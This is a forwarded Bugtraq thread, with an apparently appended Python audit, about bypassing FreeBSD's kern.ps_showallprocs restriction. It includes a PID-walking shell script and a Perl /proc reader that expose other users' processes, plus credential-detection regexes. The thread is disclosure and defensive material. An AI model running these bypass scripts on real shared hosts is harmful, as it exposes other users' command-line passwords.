[UC-FreeBSD] FreeBSD and the impossibility of hiding information about other users' processes

Lokhin lokhin на UnixCenter.ru
Wed Jan 8 11:21:00 MSK 2003


Every admin has at some point wondered how to prevent users from viewing
other users' process tables.

Read on...

----------  Forwarded message  ----------

Subject: ps information leak in FreeBSD
Date: 5 January 2003 23:46
From: "Cache" <cache на sowatech.com.pl>
To: bugtraq на securityfocus.net

Nothing special, lame :)

Hi,

0x01 About
0x02 Practical
0x03 Conclusion
0x04 Install
0x05 End
0x06 Greetz


0x01 About:

Author: Rafael Lesniak / 05012003 Hannover / cache на irc.pl
Sorry for My English

This is a little information leak. This bug(?) is not dangerous, but a
normal user can see all processes on the box using e.g. /bin/ps;

Affected Systems:
FreeBSD		:possibly all
OpenBSD		:don't know
Linux		:don't know
Other		:don't know

0x02 Practical:

(I don't use /proc.)

Last login: Sun Jan  5 00:13:01 on ttyv0
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
    The Regents of the University of California.  All rights reserved.

FreeBSD 4.7-RELEASE (SILENT) #1: Sun Jan  5 00:10:51 GMT 2003

Welcome to FreeBSD!


[cache на silent][ttyv1] ~> grep "FreeBSD:" /usr/src/sys/i386/conf/LINT
# $FreeBSD: src/sys/i386/conf/LINT,v 1.749.2.124 2002/10/05 18:31:47 scottl Exp

[cache на silent][ttyv1] ~> sysctl -a | grep show
kern.ps_showallprocs: 0
[cache на silent][ttyv1] ~> ps -auxwwwp 101
USER   PID %CPU %MEM   VSZ  RSS  TT  STAT STARTED      TIME COMMAND
root   101  0,0  0,2  1020  740  ??  Is    0:12     0:00,01 /usr/sbin/cron

ps [-aCcefhjlmrSTuvwx] [-M core] [-N system] [-O fmt] [-o fmt] [-p pid]
    [-t tty] [-U username]

-p      Display information associated with the specified process ID.

--- cut ---

0x03 Conclusion:

I hope it is a good idea to protect all process information
(anyway, what do we need kern.ps_showallprocs for?)

[cache на silent][ttyv1] ~> cat info.sh
#!/bin/sh
# Walk the PID space and query each PID individually with ps -p; with
# kern.ps_showallprocs=0 the per-PID query still returns other users' processes.
# FreeBSD PIDs never exceed 99999 (PID_MAX), so the loop is bounded instead of
# running forever, and awk matches the PID column exactly instead of grep
# matching the number anywhere on the line.
pid=0
while [ "$pid" -le 99999 ]; do
    /bin/ps -auxwwwp "$pid" | /usr/bin/awk -v p="$pid" '$2 == p'
    pid=`expr $pid + 1`
done

--- cut ---

See out.log how it works.

0x04 Install:

$ mkdir /tmp/patch
$ cp proc-patch.tar.gz /tmp/patch
$ cd /tmp/patch
$ tar -zxvf proc-patch.tar.gz
$ su
# patch -p0 < proc.patch

--- cut ---
Hmm...  Looks like a new-style context diff to me...
The text leading up to this was:
--------------------------

|*** /usr/src/sys/kern/kern_proc.c      Tue May  1 13:39:06 2001
|--- /usr/src/sys/kern/kern_proc.c      Sun Jan  5 00:18:40 2003

--------------------------
Patching file /usr/src/sys/kern/kern_proc.c using Plan A...
Hunk #1 succeeded at 453.
done
--- cut ---

configure Your kernel, compile, install and that's all.

0x05 End:

I have made this little patch for My FreeBSD box, and this method
doesn't work. Maybe it is possible to do, but this is not My
skill level );] ...

0x06 Greetz:
    kador, Lam3rz, layon, ultor, neutrinka, !pl-bsd, and
    all lamerz ...


## Rafal (cache) Lesniak   #######
CoSysOp cache /at/ sowatech.com.pl
### http://www.sowatech.com.pl ###

-------------------------------------------------------


----------  Forwarded message  ----------

Subject: Re: ps information leak in FreeBSD
Date: 7 January 2003 00:19
From: Sean Kelly <smkelly на zombie.org>
To: Cache <cache на sowatech.com.pl>, security-officer на FreeBSD.org

On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> [cache на silent][ttyv1] ~> sysctl -a | grep show
> kern.ps_showallprocs: 0
> [cache на silent][ttyv1] ~> ps -auxwwwp 101
> USER   PID %CPU %MEM   VSZ  RSS  TT  STAT STARTED      TIME COMMAND
> root   101  0,0  0,2  1020  740  ??  Is    0:12     0:00,01 /usr/sbin/cron

I've been aware of this problem for a long time, and in fact I made a patch
against 4.6-STABLE which can be applied to correct it. I am not sure how
portable it will be to 4.7-STABLE, but I imagine it would work.

Please see the relevant FreeBSD PR:
http://www.FreeBSD.org/cgi/query-pr.cgi?pr=kern/42065

--
Sean Kelly         | PGP KeyID: D2E5E296
smkelly на zombie.org | http://www.zombie.org

-------------------------------------------------------


----------  Forwarded message  ----------

Subject: Re: ps information leak in FreeBSD
Date: 7 January 2003 12:18
From: Jez Hancock <jez.hancock на munk.nu>
To: bugtraq на securityfocus.com

On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> normal user can see all process on the box using ex. /bin/ps;

This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc.  The following script was also
posted by someone to demonstrate this:

#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill.  its basically an output format]
#
# Tested on FreeBSD 4.5-RC.

print "[USER]      [GROUP]     [PID]   [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
 if(${proc}=~/[0-9]/o){
  unshift(@pids, ${proc});
 }
}
foreach $pid (@pids){
 open(FD, "ls -al /proc/$pid/file|");
 while(<FD>){
  chomp;
  ${l}=$_;
  ${l}=~s/\s{1,}/ /g;
  if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
   &ppid(${1},${2},${pid},${3});
  }
 }
 close(FD);
}
exit(0);

sub ppid(){
 (${a},${b},${c},${d})=@_;
 undef(${str});
 undef(${line});
 if(-e "/proc/$c/cmdline"){
  open(heh,"cat /proc/$c/cmdline|");
  @hah=<heh>;
  @chars=split(//, $hah[0]);   # first line of cmdline (list-archive mangled the sigil here)
  foreach ${chr} (@chars){
   if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
    ${str}.=" ";
   }else{
    ${str}.=${chr};
   }
  }
  ${line}.=${a};
  while(length(${line})<11){${line}.=" ";} #alignment...
  ${line}.=" ".${b};
  while(length(${line})<23){${line}.=" ";}
  ${line}.=" ".${c};
  while(length(${line})<31){${line}.=" ";}
  chop(${str});
  if(${d}eq"unknown"){
   ${str}=~s/\s{1,}//g;
   ${line}.=" ("."${str}".")";
  }else{
   ${line}.=" "."${str}";
  }
  @line=split(//,${line});
  if(length(${line})>80){
   ${cntr}=0;
   foreach ${char} (@line){
    if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
     print "\n"." "x32;          #^Anything >, deal with the rollover.
    }
    print "${char}";
    ${cntr}++;
   }
   print "\n";
  }
  else{
   print "${line}\n";
  }
  return(0);
 }
}

I believe someone (last poster in this thread?) also posted a patch on the
same list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p
options:

mysql -u user -p mypassword

on the commandline, thinking that this info will not show up in ps listings
when ps is run by other users.  Ho hum...

Regards,

Jez Hancock

-------------------------------------------------------
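The two practical points of the thread are that kern.ps_showallprocs=0 can be bypassed (per-PID ps queries in the first message, /proc in the third) and that anything placed on a command line is therefore readable by every local user. The audit below is an added example, not code from any of the forwarded messages or from FreeBSD: run as an unprivileged user over the output of `ps -auxww`, it reports whether processes of other users are visible (i.e. whether the restriction actually holds on this box) and which visible command lines carry what looks like a credential. The ps sample, the user names and PIDs are constructed for the example, and the function names are my own.

```python
import re

# Constructed sample of `ps -auxww` as the unprivileged user "cache" would see it
# on a box where the kern.ps_showallprocs=0 restriction is NOT effective.
# Users, PIDs, timings and commands are made up for this example.
SAMPLE_PS_OUTPUT = """\
USER   PID %CPU %MEM   VSZ  RSS  TT  STAT STARTED      TIME COMMAND
root   101  0.0  0.2  1020  740  ??  Is    0:12     0:00.01 /usr/sbin/cron
cache  412  0.0  0.5  2200 1100  v1  Ss    0:15     0:00.10 -tcsh
alice  517  0.1  1.0  5200 2800  v2  S+    0:20     0:00.30 mysql -u alice -pS3cret shopdb
bob    603  0.0  0.8  4100 2100  ??  S     0:21     0:00.05 curl --user bob:hunter2 http://example.invalid/
cache  611  0.0  0.3  1300  800  v1  R+    0:22     0:00.00 ps -auxww
"""

# Constructed sample of what the same user should see when the restriction works:
# only their own processes.
RESTRICTED_PS_OUTPUT = """\
USER   PID %CPU %MEM   VSZ  RSS  TT  STAT STARTED      TIME COMMAND
cache  412  0.0  0.5  2200 1100  v1  Ss    0:15     0:00.10 -tcsh
cache  611  0.0  0.3  1300  800  v1  R+    0:22     0:00.00 ps -auxww
"""

# argv shapes that commonly carry a secret; extend for the tools in use locally.
SECRET_ARG_PATTERNS = [
    re.compile(r"(?:^|\s)-p\S+"),       # mysql -pPASSWORD (password glued to -p)
    re.compile(r"(?:^|\s)-p\s+\S+"),    # mysql -p PASSWORD, as written in the post
    re.compile(r"--password=\S+"),
    re.compile(r"--user\s+\S+:\S+"),    # curl --user name:pass
]


def parse_ps(text):
    """Turn `ps -auxww` text into a list of dicts keyed by the header names.

    COMMAND is the last column and may contain spaces, so the split is
    limited to (number of header fields - 1) to keep the command intact."""
    lines = text.strip().splitlines()
    header = lines[0].split()
    rows = []
    for line in lines[1:]:
        parts = line.split(None, len(header) - 1)
        rows.append(dict(zip(header, parts)))
    return rows


def foreign_processes(rows, me):
    """Processes owned by someone other than the user running the audit."""
    return [r for r in rows if r["USER"] != me]


def leaked_credentials(rows):
    """(user, pid, command) for every visible command line that looks like it
    carries a password; one hit per process."""
    hits = []
    for r in rows:
        cmd = r["COMMAND"]
        if any(p.search(cmd) for p in SECRET_ARG_PATTERNS):
            hits.append((r["USER"], r["PID"], cmd))
    return hits


def audit(ps_text, me):
    """Summarise exposure from one ps listing taken as user `me`."""
    rows = parse_ps(ps_text)
    foreign = foreign_processes(rows, me)
    return {
        "restriction_effective": not foreign,   # True only if nothing foreign is visible
        "foreign": foreign,
        "leaks": leaked_credentials(rows),
    }


if __name__ == "__main__":
    # On a real box: audit(subprocess.check_output(["ps", "-auxww"], text=True), getpass.getuser())
    for name, sample in (("unrestricted", SAMPLE_PS_OUTPUT), ("restricted", RESTRICTED_PS_OUTPUT)):
        result = audit(sample, "cache")
        print(f"[{name}] other users' processes hidden: {result['restriction_effective']}")
        for user, pid, cmd in result["leaks"]:
            print(f"[{name}] credential on command line: {user} pid {pid}: {cmd}")
```

The leak report is the part worth running regularly: whether or not the kernel restriction holds, the right fix for the mysql case in the last message is to keep the password out of argv altogether, for example in a `~/.my.cnf` `[client]` section with mode 0600, since a patched ps says nothing about /proc, core files or accounting records.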

-- 
Alexey Lokhin
PGP key ID 0x792e24c9



More information about the FreeBSD mailing list